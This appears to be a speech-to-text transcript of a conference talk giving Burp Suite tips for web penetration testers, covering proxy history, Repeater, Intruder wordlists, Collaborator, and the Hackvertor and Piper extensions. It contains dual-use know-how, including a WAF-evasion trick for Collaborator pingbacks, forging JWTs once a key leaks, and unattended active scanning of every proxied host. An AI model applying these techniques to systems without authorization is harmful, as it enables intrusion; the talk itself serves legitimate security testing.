 It's a pleasure to be here once again. I think that's my third edition So I did a similar talk 10 years ago like plenty of tips. So luckily we have a different content For this year. So quickly introducing myself. I'm French. You probably notice the accent already. I own a company like a one-guy company and As said during the introduction, I'm official burp sweet training partner Mostly for Europe, but given I love Canada. So if I have customers in Canada, that will be a welcome and I train nearly 100 people a year. So that's a lot of I mean anyway, you are here for the trips the tips. So what is the plan first? I have a few tips for core tools. So tools which are here by default Then I will discuss a few extensions. Then I have a few other subjects depending on the time left and And after that we have beers and the CTF and the enjoying Montreal by itself So Regarding proxy story My point is to be as lazy as possible. So if I have to scroll through the results that's probably useless and I want to avoid that and if we look at burp sweet the default Sorting order in proxy story is the oldest on top. So you are constantly Scrolling and scrolling to the newest content. So the solution is super easy You can simply double click here have the newest entries on top and that's quite comfortable. It also work for logger You can apply the same sorting and logger plus plus two In short if you are scrolling to see the new results You probably have to change the sorting criteria Okay Second problem in proxy story. You want to map a Specific action like clicking clicking on a button in a mobile app or following a link to a specific set of resources. So what I do for example in proxy story, I will tag the Topmost entry then I will I will do something like I Don't know accessing a website a complex one like solar and Here I can easily map so everything which is higher than the gray line is related to my Latest action and a variant of this strategy is that I will intercept the traffic Access specific host Switch back to proxy and here I can color colorize directly from this menu. So it's the same outcome but with a different workflow and I switch back to plastic proxy story and I can see the first the very first request is gray Green sorry Okay, that's some beginner stuff Let's discuss repeater. So in repeater on the left. We have the request on the right We have the response and quite often we are interested in a specific Location of the response. So I have an example for that Okay, scroll to match, okay, this is a web got so that's vulnerable web app we can see here and This parameter is used in a command and the command is output it Somewhere in the result in the response. So the Less efficient strategy would be to scroll and simply go to the location Something a little bit better would be to search you can see at the Bottom I can go directly to this entry, but every time I Send in your request. I have to scroll again. So behind the cog you have this entry and Then the response will be scrolled Every time you have a new content. So if I submit my request I go directly to the location I'm interested in so I don't need to scroll and I don't need to spend any time Looking at the I mean looking for the interesting piece of data What else since a few Years or months we can create colors. I mean create groups and Put repeater tabs inside groups. So that's very useful a Related feature which is little known is odd key for search or search tabs exactly and I use control shift s and We get a list of all tabs so we can just Navigate using the up and down key and if I type some text like Piper I see directly the and only the relevant entries. So when you have 50 or 80 entries that's very very useful. Of course, you need to put Correct names, but I mean you probably have to do it anyway Okay, let's discuss intruder In in burp sweet pro and not in the community version. There's Some interesting features in intruder When you are using simple list as I do here you have a menu top drop-down menu with plenty of word list and so that's useful by itself and It's possible to customize the word list. So from the menu bar. I go to configure predefined payload list and Here I have I can use the built-in This is a default value or point to a specific directory. That's what I do here here we go and Now I go to the same menu and I have only my own word list and if I want my own plus the built-in once I can go back to the same menu and Click on copy which will be export or dump and That will extract the built-in word list directly to my hard drive So it takes a few seconds here. We go and now I have the built-in word list on top and at the very end my My own word list Yeah, what else so this feature the fact that we can customize a word list and there's Built-in list. That's very nice. Let's say something negative There's place orders in word list. So let me show you them If I use Fuzzing full You can see base here and if we go below we can see your email here or your server name here and if you want to fully use a word list you need of course to replace these values with real ones and there's a few Payload processing options relevant to this feature So You on the screenshot you see the first one will replace base with the base value stored in positions domain will use a unique collaborator of name and for all the other place holders you need to customize manually, so here I will replace file with ETC password and your email with my own Email address It's currently a mess as you can see and as listed on the previous slide the syntax We have curly brackets versus angle brackets, and we have file versus known file So they have to Clean that But in all in all cases we have to manipulate manually replace the values and I think that plenty of bugs were missed just because Users were looking for dot dot slash dot dot slash dot dot file between curly bracket and never finding the real file of course Okay, something about collaborator so go collaborator is a way to get Notifications notifications from the web app and A very common assumption is that if you want to get a collaborator ping back you must use the collaborator domain name and We will simplify we will consider only the public collaborator server so Is this assumption really true that's the question and you can imagine that if the answer Would be yes. I will not have This content in my slides. So the answer is no or it depends for DNS Pingbacks you must use the collaborator domain name for HTTP interactions You can use any domain name as long as it points to the correct IP address so I could do it live but I Mean I did I did it live five minutes ago I will Take a collaborator of name. So that's the public server and that's my collaborator ID or Of name and it points to several IP addresses, but we will use this one forty four dot seventy seven etc And we will use another domain name Resolving to the same IP. So NIP dot IO is a free service and this is the IP address X encoded and this is just a random string. I mean not so random of course So we are a domain name we have a domain name pointing to the collaborator IP address and And my off name is our SN etc etc and It works surprise surprisingly well here. I will simply access collaborator via my own domain name and Put my collaborator Of name directly in the bus. It could be in a parameter name It could be in a parameter in a parameter value and as you can see the interaction is correctly Linked to my own instance of burpsuit. We can see here our SN. This is my collaborator ID and We can do I mean there's plenty of ways That's another one. Oops my bad. I use My collaborator ID as the user agent and once again the traffic is correctly correlated to my own interactions and I mean if the web application firewall is looking for the domain name here There's no way to find it. Okay, so we have a clean bypass in in most situations Okay, let's discuss Extensions. Hikevertor is a Swiss knife like you can do whatever you want It's XML or similar to XML tax and you can chain them so you can apply several transformation on the fly and That's a basic example Here we have a string and we will compress the string and the resulting binaries Data will be base 64 anchored it and we get something like that So that's a minimalist example We can generate fake data and that's very useful when you have to generate unique Values if you are creating users or let's say files via an API You probably have to provide unique fine names or unique user names and you can use the fake Fake hacker fake book fake company tax in order to generate like Valid data, but a random one like in this example I'm just asking for sentences and we get a few Sentences generated on the fly We can go to more complex solution here. I will anchored my email address and put that in a viable called email and The flag here means the viable is global so we can reuse it anywhere in burp in a different tab in a different tool and Somewhere else possibly in intruder. I will get my viable and maybe iterate on UID for example and everything is in a JWT tag and Hack vector will generate tokens on the fly So as soon as you are you have been able to leak the secret key You can generate tokens on the fly simply using intruder plus hack vector If if there's anybody doing HTTP smuggling You probably know that Managing size is a mess because we have usually two size and we need to manage them dynamically, so it's a complex hack vector setup, but it does exactly that we have some text here in the middle and On the line above we will get the exact decimal size of the chunk and Here in content lance we will have the size of the size so the length of the size plus two using the arithmetic Tag, and I think I have a demonstration Not sure if you can read anything Can you read something? Yeah, okay Because a hack vector we can't set the font size So that's a problem, but as you can see here. I have a short string the size is eight Here and the content lance is three, but if I add some characters Okay, we can see that now the size is 26. So that's one extra character and The content lance is now for instead of three That's looks like Nothing, but then you can Pay your attention to this section because maybe you are exploiting a complex bug and you don't want to spend any brainpower Managing the size manually and we can go very far. So I will stop giving example Yes, that's Specific application where you need to sign the body of the request with the CSRF token and that could be done on the fly with hack vector Okay, and there's much more we can execute Python code we can execute a system command like cat whatever We can access the Execution context so we can have the URL the value of a specific parameter, I mean that's I mean the more time you spend with high vector the more you like it. It's really good There's a big disadvantage Using tax will break burps in tax parsing and that has a few side effects, but Yeah, we don't really care like it's not something that will forbid us to use the extension Okay, Piper, I need to go quite fast. So Piper the ID is Interesting you can execute anything running on your workstation or laptop Directly in burp. So it could be an interpreter like Python It could be any command line or GUI application you have locally So I have a few examples Let's switch to Okay, so On the right I have the response which is a big blob of JSON data and I want to make sense of the data so in Piper, I will enable the grown entry and The configuration is very basic If the body start with a square or curly bracket then I pass the response body to grown and the result it appears directly in burp and That's all that's all we need here. I have a new Tab here labeled grown and if I click there I see the Response body Processed by grown and they have nothing else to do just define a filter and define which command should be executed If you prefer let's say jq we can we could have exactly the same config for jq that that was grown and and ocular so ocular is a PDF reader, but we don't remind okay any PDF reader will work and We have a simile similar configuration if the response Start with a PDF tag PDF magic then we Enable a PDF reader in the contextual menu. So here I can go to extension Piper and Given we have the PDF magic. I can directly open the response in file viewer. So if you are Processing a lot of complex files it's very efficient compared to Exporting to file removing the headers changing the extension, etc. etc and Last demonstration for Piper We will use We will compare some entries so I'm not very happy with the built-in comparer and I will take Few Sorry three requests. So the three yellow ones here Right-click and here is the menu Will appear only if we have two or three entries because meld can compare two or three files and I will compare the requests and I get directly the files I mean the traffic saved to disk and we can see the file names here temporary file names and The meld command line is generated on the fly then executed. So that's very very convenient Okay, Burbunty. It's an extension used to write your own Scanning check, but I think it will die soon because we have a core feature called beat checks that should be Deployed I mean released in a few weeks and Then you have a scripting language and you can define your your payload here I mean your attack then you define how to identify a venerability and you have some meta information here and I hope the community will share this kind of of Recipes Like publicly and you have a link to a video describing the feature in the nuts What else I need to go very fast Keyboard shortcuts keyboard shortcuts. There's plenty of keyboard shortcuts if you want to be very efficient you need to use a Combination of shortcuts so switching from proxy story to repeater That's free action sending to repeater. We have control R switching to the repeater tab that's control shift R and Emitting the repeater request. That's Control space. So if I do it I pick an entry and I will use a shortcut so control R control shift R control space and It takes like one or two seconds to switch from proxy story to repeater and You will use muscle memory. So you will not think about about the free odd keys It's just a complex odd key bringing you directly to to repeater Poor man automation. That's when you are looking for bugs like in bug bounty But you you are in holidays or you are coming for for North Tech and you want to look for vulnerabilities anyway So we need two ingredients. We need a life task in burp And we need a very specific configuration the life task will monitor proxy story and Every item appearing in the proxy story will be scanned so in most situations that's very dangerous and We will combine that to with fuff and fuff We will use a specific option. I will show the option Which is dash replay dash proxy and all the interesting entries will be Relayed through a proxy. So we combine Fuff here looking for status code to all and every finding will be piped I mean will be forwarded to burp and In burp we have this configuration. We have a life task Monitoring the proxy whatever the scope is. I mean whatever the hostname is will we will trigger an active scan so For sure that's not very advanced like it's not a real pentest, but if you are In holidays, it's better than nothing and you could even run fuff on a VPS and Forward to burp through SSH listener. So you have burp locally and you have fuff on a Remote server and they are talking one to the other. That's quite elegant Okay Not sure how many time I have left Something about performances. I have very very often some feedback about burp being Resource intensive My opinion is very clear Computers are cheaper than brains. So you can send this slide to your boss or manager you want computer which is larger than necessary and Whatever you are doing like a burp or running VM, etc That should not be something slowly slowing you down I mean, it's already difficult to find vulnerabilities. So having a decent computer I think it's a good idea How to stay up to date? So of course, this is just a few tricks Port trigger as Channel on YouTube they have very short videos and very long ones both are very good They have a bunch of Twitter accounts Plus all the accounts all of the employees themselves I have An account Twitter account dedicated to burp. So I have my real account and this one is exclusively Rated to burp tips or links or whatever and I'm nearly on time. So if you want to access the slides, they are already online So you John you can just get them And what else if you want some I mean if you are if you like what you what you saw I will Release a workshop for free next month. So next month There's a free online conference called naamcon and I will have I'm not sure 60 or 90 minute workshop Rated to session management like cookies and and Jason tokens, whatever and so that's a bit later and I think I'm nearly on time Thanks for listening and if you have any questions, they are welcome if we have the time and I will be at the CTF Friday evening and we with no no Goal to score anything so if you have any questions any questions relating to to the challenges and how could we Automate them and that would be like a fun subject Thanks for listening